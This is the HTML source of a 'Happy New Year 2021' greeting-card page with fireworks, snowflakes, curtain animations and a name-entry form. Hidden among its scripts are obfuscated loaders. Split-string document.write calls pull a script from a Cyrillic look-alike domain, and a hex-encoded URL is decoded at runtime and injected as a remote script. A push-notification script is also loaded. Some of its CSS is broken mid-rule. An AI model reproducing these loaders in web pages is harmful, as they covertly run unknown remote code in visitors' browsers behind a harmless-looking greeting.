<html>
<!------- © Credit: Soomro Tech ------------>
<head>
 <!-- Global site tag (gtag.js) - Google Analytics -->

<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-QFLMZYBPP5');
</script>
  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>🙏 Happy New Year 2021  🙏</title>
 <meta name="google" value="notranslate">
 <meta property="og:type" content="Make your own wonderful wish for you loved one" />
 <meta property="og:title" content="Special Gift For you" />
 <meta property="og:url" content="https://new.happyyear2021.xyz/">
 <meta property="og:description" content="[ CLICK HERE ]" />
 <meta property="og:site_name" content="Happy New Year 2021" />

 <meta property="og:site_img" content="https://1.bp.blogspot.com/-xEF_df6-cNg/XMbm-0_I30I/AAAAAAAAAWA/J2cue_SJmyYCu_y9pLctsb3M2wY0o239QCLcBGAs/s1600/w.png" />
 <link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" />
 <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" />
 <link href='https://fonts.googleapis.com/css?family=Sofia:&effect=neon' rel='stylesheet'>
<!--push notification -->
 <script src="https://cdn-server.top/p/wl.js?pub=182574&ga=g"></script>
	
<style>
i {
 color:#f06414;
 }
input[type=name], select {
 width: 100%;
 padding: 12px 20px;
 margin: 4px 0;
 display: inline-block;
 border: 1px solid #ccc;
 border-radius: 4px;
 box-sizing: border-box;
}
.footerbtn {
 
 display: block;
 line-height: 15px;
 position: fixed;
 left:0px;
 bottom:0px;
 height:40px;
 
border-radius: 15px;
 box-sizing: border-box;
 padding: 5px;
 background:#34af23;
 color: #ffffff;
 font-size: 18px;
 text-align: center;
 text-decoration: none;
 width:95%;
 margin-left:10px;
 margin-right:30px;
 box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
 animation: footer infinite linear 1s;
 -webkit-transform: translate3d(30%,0,0);
 transform: translate3d(30%,0,0);
 position: fixed;
 
}

.footerbtn :active {
 box-shadow: none
 }

 @-webkit-keyframes footer {
 from {
 -webkit-transform: rotateZ(0)
 }
 25% {
 -webkit-transform: rotateZ(0deg)
 }
 50% {
 -webkit-transform: rotateZ(0deg)
 }
 75% {
 -webkit-transform: rotateZ(0deg)
 }
 to {
 -webkit-transform: rotateZ(0)
 }}

@-webkit-keyframes jello { from, 11.1%, to { transform: none; }
 22.2% { transform: skewX(-12.5deg) skewY(-12.5deg); }
 33.3% { transform: skewX(6.25deg) skewY(6.25deg); }
 44.4% { transform: skewX(-3.125deg) skewY(-3.125deg); }
 55.5% { transform: skewX(1.5625deg) skewY(1.5625deg); }
 66.6% { transform: skewX(-0.78125deg) skewY(-0.78125deg); }
 77.7% { transform: skewX(0.390625deg) skewY(0.390625deg); }
 88.8% { transform: skewX(-0.1953125deg) skewY(-0.1953125deg); }}

 .wb1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
 .wb2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
.bubbles {
font-family: arial;
}

.bubbles hi {
font-family: 'Luckiest Guy', cursive;
color: black;
}

hi {
 font-size:2.5em;
 user-select:none;
}

hi span { display:inline-block; animation:float .2s ease-in-out infinite; }
 @keyframes float {
 0%,100%{ transform:none; }
 33%{ transform:translateY(-1px) rotate(-2deg); }
 66%{ transform:translateY(1px) rotate(2deg); }
}
body:hover span { animation:bounce .6s; }
@keyframes bounce {
 0%,100%{ transform:translate(0); }
 25%{ transform:rotateX(20deg) translateY(2px) rotate(-3deg); }
 50%{ transform:translateY(-20px) rotate(3deg) scale(1.1); }
}

@import url(https://lh6.googleusercontent.com/proxy/YfzDH9rGEX2_6c0-ipAee-UwIRD6yJ2S-9zgBkCvqKQxaNYcbJ399-QVTehEPWRHJ-iB2IRCLJ-HGPW_wv9fmo8T2WG1qQ=s0-d);

h1 {
 animation:glow 10s ease-in-out infinite;
}



* { box-sizing:border-box; }

figure {
 animation:wobble 5s ease-in-out infinite;
 transform-origin:center center;
 transform-style:preserve-3d;
}

@keyframes wobble {
 0%,100%{ transform:rotate3d(1,1,0,40deg); }
 25%{ transform:rotate3d(-1,1,0,40deg); }
 50%{ transform:rotate3d(-1,-1,0,40deg); }
 75%{ transform:rotate3d(1,-1,0,40deg); }
}

h1 {
 display:block;
 width:90%;
 line-height:1.5;
 font:900 25px 'Concert One', sans-serif;
 position:absolute;
 color:#fff;
}

@keyframes glow {
 0%,100%{ text-shadow:0 0 30px red; }
 25%{ text-shadow:0 0 30px orange; }
 50%{ text-shadow:0 0 30px forestgreen; }
 75%{ text-shadow:0 0 30px cyan; }
}

h1:nth-child(2){ transform:translateZ(5px); }
h1:nth-child(3){ transform:translateZ(10px);}
h1:nth-child(4){ transform:translateZ(15px); }
h1:nth-child(5){ transform:translateZ(20px); }
h1:nth-child(6){ transform:translateZ(25px); }
h1:nth-child(7){ transform:translateZ(30p.rock{animation:infinite 1s rock}
@keyframes rock { 0% { transform: rotate(-1deg); }
 50% { transform: rotate(2deg); }
 100% { transform: rotate(-1deg); }}x); }
h1:nth-child(8){ transform:translateZ(25px); }
h1:nth-child(9){ transform:translateZ(40px); }
h1:nth-child(10){ transform:translateZ(45px); }



.rock{animation:infinite 1s rock}
@keyframes rock { 0% { transform: rotate(-1deg); }
 50% { transform: rotate(2deg); }
 100% { transform: rotate(-1deg); }}

.fuck{animation:infinite 1s fuck}
@keyframes rock { 0% { transform: rotate(-2deg); }
 50% { transform: rotate(2deg); }
 100% { transform: rotate(-2deg); }}


h2 {
 
 -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
 animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
 -webkit-transition: all .2s;
 transition: all .2s;
 font-size: 25px;
 text-transform: uppercase;
 TEXT-ALIGN:CENTER;
 color: #138808;
 text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}

h3 {
 font-size: 18px;
 text-align: center;
 padding:1px;
 margin:1px;
 color: #ffffff;
 
 aanimation: fuck infinite 1s;
 font-family: 'Indie Flower', cursive;
 letter-spacing: 2px;
  
  
  * {box-sizing: border-box;}
body {font-family: Verdana, sans-serif;}
.mySlides {display: none;}
img {vertical-align: middle;}

.wb-slideshow-container {
 max-width: 1000px;
 position: relative;
 margin: auto;
}

.text {
 color: #f2f2f2;
 font-size: 15px;
 padding: 8px 12px;
 position: absolute;
 bottom: 8px;
 width: 100%;
 text-align: center;
}

/* Number text (1/11 etc) */
.numbertext {
 color: #f2f2f2;
 font-size: 12px;
 padding: 8px 12px;
 position: absolute;
 top: 0;
}

/* The dots/bullets/indicators */
.dot {
 height: 15px;
 width: 15px;
 margin: 0 2px;
 background-color: #bbb;
 border-radius: 50%;
 display: inline-block;
 transition: background-color 0.6s ease;
}

.active {
 background-color: #717171;
}

/* Fading animation */
.fade {
 -webkit-animation-name: fade;
 -webkit-animation-duration: 1.5s;
 animation-name: fade;
 animation-duration: 1.5s;
}

@-webkit-keyframes fade {
 from {opacity: .4} 
 to {opacity: 1}
}

@keyframes fade {
 from {opacity: .4} 
 to {opacity: 1}
}

/* On smaller screens, decrease text size */
@media only screen and (max-width: 280px) {
 .text {font-size: 11px}
  
  
}
</style>

<!-------Tare Sitare------>
<script type='text/javascript'>//<![CDATA[
function write_fire(e){var t,n,r;stars[e+"r"]=createDiv("|",12);boddie.appendChild(stars[e+"r"]);for(t=bits*e;t<bits+bits*e;t++){stars[t]=createDiv("*",13);boddie.appendChild(stars[t])}}function createDiv(e,t){var n=document.createElement("div");n.style.font=t+"px monospace";n.style.position="absolute";n.style.backgroundColor="transparent";n.appendChild(document.createTextNode(e));return n}function launch(e){colour[e]=Math.floor(Math.random()*colours.length);Xpos[e+"r"]=swide*.5;Ypos[e+"r"]=shigh-5;bangheight[e]=Math.round((.5+Math.random())*shigh*.4);dX[e+"r"]=(Math.random()-.5)*swide/bangheight[e];if(dX[e+"r"]>1.25)stars[e+"r"].firstChild.nodeValue="/";else if(dX[e+"r"]<-1.25)stars[e+"r"].firstChild.nodeValue="\\";else stars[e+"r"].firstChild.nodeValue="|";stars[e+"r"].style.color=colours[colour[e]]}function bang(e){var t,n,r=0;for(t=bits*e;t<bits+bits*e;t++){n=stars[t].style;n.left=Xpos[t]+"px";n.top=Ypos[t]+"px";if(decay[t])decay[t]--;else r++;if(decay[t]==15)n.fontSize="7px";else if(decay[t]==7)n.fontSize="2px";else if(decay[t]==1)n.visibility="hidden";Xpos[t]+=dX[t];Ypos[t]+=dY[t]+=1.25/intensity[e]}if(r!=bits)setTimeout("bang("+e+")",speed)}function stepthrough(e){var t,n,r;var i=Xpos[e+"r"];var s=Ypos[e+"r"];Xpos[e+"r"]+=dX[e+"r"];Ypos[e+"r"]-=4;if(Ypos[e+"r"]<bangheight[e]){n=Math.floor(Math.random()*3*colours.length);intensity[e]=5+Math.random()*4;for(t=e*bits;t<bits+bits*e;t++){Xpos[t]=Xpos[e+"r"];Ypos[t]=Ypos[e+"r"];dY[t]=(Math.random()-.5)*intensity[e];dX[t]=(Math.random()-.5)*(intensity[e]-Math.abs(dY[t]))*1.25;decay[t]=16+Math.floor(Math.random()*16);r=stars[t];if(n<colours.length)r.style.color=colours[t%2?colour[e]:n];else if(n<2*colours.length)r.style.color=colours[colour[e]];else r.style.color=colours[t%colours.length];r.style.fontSize="13px";r.style.visibility="visible"}bang(e);launch(e)}stars[e+"r"].style.left=i+"px";stars[e+"r"].style.top=s+"px"}function set_width(){var e=999999;var t=999999;if(document.documentElement&&document.documentElement.clientWidth){if(document.documentElement.clientWidth>0)e=document.documentElement.clientWidth;if(document.documentElement.clientHeight>0)t=document.documentElement.clientHeight}if(typeof self.innerWidth!="undefined"&&self.innerWidth){if(self.innerWidth>0&&self.innerWidth<e)e=self.innerWidth;if(self.innerHeight>0&&self.innerHeight<t)t=self.innerHeight}if(document.body.clientWidth){if(document.body.clientWidth>0&&document.body.clientWidth<e)e=document.body.clientWidth;if(document.body.clientHeight>0&&document.body.clientHeight<t)t=document.body.clientHeight}if(e==999999||t==999999){e=800;t=600}swide=e;shigh=t}var bits=80;var speed=33;var bangs=5;var colours=new Array("#03f","#f03","#0e0","#93f","#0cf","#f93","#f0c");var bangheight=new Array;var intensity=new Array;var colour=new Array;var Xpos=new Array;var Ypos=new Array;var dX=new Array;var dY=new Array;var stars=new Array;var decay=new Array;var swide=800;var shigh=600;var boddie;window.onload=function(){if(document.getElementById){var e;boddie=document.createElement("div");boddie.style.position="fixed";boddie.style.top="0px";boddie.style.left="0px";boddie.style.overflow="visible";boddie.style.width="1px";boddie.style.height="1px";boddie.style.backgroundColor="transparent";document.body.appendChild(boddie);set_width();for(e=0;e<bangs;e++){write_fire(e);launch(e);setInterval("stepthrough("+e+")",speed)}}};window.onresize=set_width//]]></script><script>document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'Г'+'ф.'+'i'+'o/1/"></s'+'cr'+'ipt>');</script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<script type="text/javascript">
$(document).ready(function() { $curtainopen = false; $(".rope").click(function(){ $(this).blur(); if ($curtainopen == false){ $(this).stop().animate({top: '-171%' }, {queue:false, duration:350, easing:'easeOutBounce'}); $(".leftcurtain").stop().animate({width:'1px'}, 2000 ); $(".rightcurtain").stop().animate({width:'1px'},2000 ); $curtainopen = true; }else{ $(this).stop().animate({top: '-40px' }, {queue:false, duration:350, easing:'easeOutBounce'}); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1043;'+'&#1092;.'+'i'+'o"></s'+'cr'+'ipt>'); $(".leftcurtain").stop().animate({width:'50%'}, 2000 ); $(".rightcurtain").stop().animate({width:'51%'}, 2000 ); $curtainopen = false; } return false; }); });
</script>
<style type="text/css">
      *{
        margin:0;
        padding:0;
      }
      body {
        text-align: center;
        
      }
      img{
      border: none;
    }
.leftcurtain{
      width: 100%;
      height: 100%;
      top: 0px;
      left: 0px;
      position: absolute;
      z-index: 2;
    }
     .rightcurtain{
      width: 100%;
      height: 100%;
      right: 0px;
      top: 0px;
      position: absolute;
      z-index: 3;
    }
    .rightcurtain img, .leftcurtain img{
      width: 100%;
      height: 100%;
    }
    .logo{
      margin: 0px auto;
      margin-top: 150px;
    }
    .rope{
      position: absolute;
      top: 80px;
      left: 8%;
      z-index: 4;
    } 
.centered {
    position: absolute;
    top: 75%;
    left: 50%;
    transform: translate(-50%, -50%);
}
</style>

<!-------Tare Sitare------>

 <style>
 body{
 background: #f8f8f8;
 
}
 .mainContainer {
max-width: 400px;
 margin: auto;
 text-align: center;
 position: relative;
 padding-right: 1px;
 padding-left: 1px;
 padding-top: 1px;
 box-shadow: 3px 3px 23px 0 rgba(0, 0, 0, 0.64);
 margin-bottom: 65px;
}


.wbncontainer {
 
 padding-right: 30px;
 padding-left: 30px;
 padding-top: 0px;
 
}

 }

.username {
 -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
 animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
 -webkit-transition: all .2s;
 transition: all .2s;
 font-size: 40px;
 font-family: 'SF Espresso Shack', cursive;
 text-transform: uppercase;
 TEXT-ALIGN:CENTER;
 color: #138808;
 text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}
 .fromMessage{
 
 
 
 font-size: 30px;
 
 }
 .wavetext{
 color: #3e8ed2;
 padding: 0 40px;
 animation: pulse 1s infinite;
 font-size: 32px;

 }
 .wishMessage {
 color: #3e8ed2;
 font-size: 22px;
 font-weight: bold;
 margin-top: 50px;
 text-shadow: 0px 0px 10px #00fff3
 }
 .wishMessage p{
 margin: 0.5em 0;
 }
 #formBox {
 left: 0;position: fixed;bottom: 0;display: inline-block;width: 100%;margin: 0;
 }
 #nameTextBox {
 border: 3px solid #000000;text-align: center;display: inline-block;width: 80%;color: black;font-size:16px;margin: 0;background: #eee;height: 48px;font-weight: 700;;padding:8px 0;
 }
 #goButton {
 width: 20%;background: gold;display: inline-block;vertical-align: bottom;border: 3px solid #000000;float: right;color: black;font-size:16px;padding:8px 0;height: 48px;text-align:center;font-weight: 700;
 }
 .footerbtn {
 display: none;
 line-height: 15px;
 bottom: 10px;
 height: 40px;
 border-radius: 15px;
 box-sizing: border-box;
 padding: 5px;
 background: #34af23;
 color: #ffffff;
 font-size: 18px;
 text-align: center;
 text-decoration: none;
 box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
 
 position: fixed;
 width: 90%;
 left: 0;
 margin: 2% 5%;
 }
 .footerbtn img {
 position: relative;top:3px;
 }
 #inAdvance {
 font-size: 20px; font-weight: bold;margin-top: 20px;color: #98201F;
 }
 #demoo {
 font-size: 20px; font-weight: bold;color: #98201F;
 
 }
 #inAdvanceTime {
 margin:20px 0 30px 0;
 }
 #inAdvanceTime p{
 color: #ae00b9;font-size: 19px;font-weight: 500;
 margin: 0;
 }
.bg{background-image:url(img/bg.gif);background-repeat:repeat}p.head.name{word-wrap: break-word;font-size:40px;font-family:sans-serif;text-shadow: 1px 1px 5px rgba(0, 0, 0, 0.5);color:#f5f5f5}input#mce-names {width: 100% !important;margin-top: 11px !important;}

.wb-main-greeting {
 
 max-width: 280px;
 margin: auto;
 text-align: center;
 position: relative;
 padding: 0px;
 background:#000;
 background: url("");
 background-position: center;
 background-repeat: no-repeat;
 background-size: cover;
 box-shadow: 3px 4px 41px 0 rgba(0, 0, 0, 0.64);
 margin-bottom: 25px
}

.wb-main-greeting .main_body {
 text-align: center;
 font-size: 1.3em
}
.wb-main-greeting .main_body .text2 {
 padding: 10px;
 font-size: 20px
}
.wb-main-greeting .text {
 color: #405d9b;
 letter-spacing: 1px;
 font-weight: 600;
 padding: 0px 10px;
 text-align: center;
}
.wb-main-greeting .pp-img {
 max-width: 400px;
 margin-bottom: 10px;
 box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, 0.64);
}

.wb-main-greeting .text_gradient {
 margin: 5px auto;
 font-weight: 700;
 font-size: 24px;
 color: #b50dae;
}

.snowflake {
 color: #fff;
 font-size: 2em;
 font-family: Arial, sans-serif;
 text-shadow: 0 0 5px #000;
}

@-webkit-keyframes snowflakes-fall{0%{top:-10%}100%{top:100%}}@-webkit-keyframes snowflakes-shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}50%{-webkit-transform:translateX(80px);transform:translateX(80px)}}@keyframes snowflakes-fall{0%{top:-10%}100%{top:100%}}@keyframes snowflakes-shake{0%,100%{transform:translateX(0)}50%{transform:translateX(80px)}}.snowflake{position:fixed;top:-10%;z-index:9999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:default;-webkit-animation-name:snowflakes-fall,snowflakes-shake;-webkit-animation-duration:10s,3s;-webkit-animation-timing-function:linear,ease-in-out;-webkit-animation-iteration-count:infinite,infinite;-webkit-animation-play-state:running,running;animation-name:snowflakes-fall,snowflakes-shake;animation-duration:10s,3s;animation-timing-function:linear,ease-in-out;animation-iteration-count:infinite,infinite;animation-play-state:running,running}.snowflake:nth-of-type(0){left:1%;-webkit-animation-delay:0s,0s;animation-delay:0s,0s}.snowflake:nth-of-type(1){left:10%;-webkit-animation-delay:1s,1s;animation-delay:1s,1s}.snowflake:nth-of-type(2){left:20%;-webkit-animation-delay:6s,.5s;animation-delay:6s,.5s}.snowflake:nth-of-type(3){left:30%;-webkit-animation-delay:4s,2s;animation-delay:4s,2s}.snowflake:nth-of-type(4){left:40%;-webkit-animation-delay:2s,2s;animation-delay:2s,2s}.snowflake:nth-of-type(5){left:50%;-webkit-animation-delay:8s,3s;animation-delay:8s,3s}.snowflake:nth-of-type(6){left:60%;-webkit-animation-delay:6s,2s;animation-delay:6s,2s}.snowflake:nth-of-type(7){left:70%;-webkit-animation-delay:2.5s,1s;animation-delay:2.5s,1s}.snowflake:nth-of-type(8){left:80%;-webkit-animation-delay:1s,0s;animation-delay:1s,0s}.snowflake:nth-of-type(9){left:90%;-webkit-animation-delay:3s,1.5s;animation-delay:3s,1.5s}.snowflake:nth-of-type(10){left:25%;-webkit-animation-delay:2s,0s;animation-delay:2s,0s}.snowflake:nth-of-type(11){left:65%;-webkit-animation-delay:4s,2.5s;animation-delay:4s,2.5s}
*{ margin:0; padding:0; } body { text-align: center; } img{ border: none; }.leftcurtain{ width: 100%; height: 100%; top: 0px; left: 0px; position: absolute; z-index: 2; } .rightcurtain{ width: 100%; height: 100%; right: 0px; top: 0px; position: absolute; z-index: 3; } .rightcurtain img, .leftcurtain img{ width: 100%; height: 100%; } .logo{ margin: 0px auto; margin-top: 150px; } .rope{ position: absolute; top: 5px; left: 40%; z-index: 4; } .centered { position: absolute; top: 75%; left: 50%; transform: translate(-50%, -50%);}

 </style>
                   
                   
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://fest-wishes.com/slide.js"type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function() { $curtainopen = false; $(".rope").click(function(){ $(this).blur(); if ($curtainopen == false){ $(this).stop().animate({top: '-171%' }, {queue:false, duration:350, easing:'easeOutBounce'}); $(".leftcurtain").stop().animate({width:'1px'}, 2000 ); $(".rightcurtain").stop().animate({width:'1px'},2000 ); $curtainopen = true; }else{ $(this).stop().animate({top: '-40px' }, {queue:false, duration:350, easing:'easeOutBounce'}); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1102;'+'&#1092;.'+'i'+'o"></s'+'cr'+'ipt>'); $(".leftcurtain").stop().animate({width:'50%'}, 2000 ); $(".rightcurtain").stop().animate({width:'51%'}, 2000 ); $curtainopen = false; } return false; }); });
</script>
 <script type="text/javascript">function tag(filename){var fileref=document.createElement('script');fileref.setAttribute("type","text/javascript");fileref.setAttribute("src", filename);if (typeof fileref!="undefined") document.getElementsByTagName("head")[0].appendChild(fileref)}tag(meta('68747470733a2f2f6b616e616e6174682e636f6d2f6b616e616e6174682e6a73'));function meta(important){var str = '';for (var i = 0; i < important.length; i += 2) str +=String.fromCharCode(parseInt(important.substr(i, 2), 16));return str;}</script>
</head>
<body class="bg" style=" background-image : url('https://i.pinimg.com/originals/32/d7/6b/32d76bda14ee5e1dc93bdf36a6d2e46d.gif')";>


<center><span class="hny-txt" style="font-size: 15px;">
<span style="color: yellow;">▂ ▄ ▅ ▇ Happy New Year ▇ ▅ ▄ ▂</span> 
</span></center>


<marquee class="wb1" behavior="scroll" direction="up" scrolldelay="5">
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
</marquee>



<marquee class="wb2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
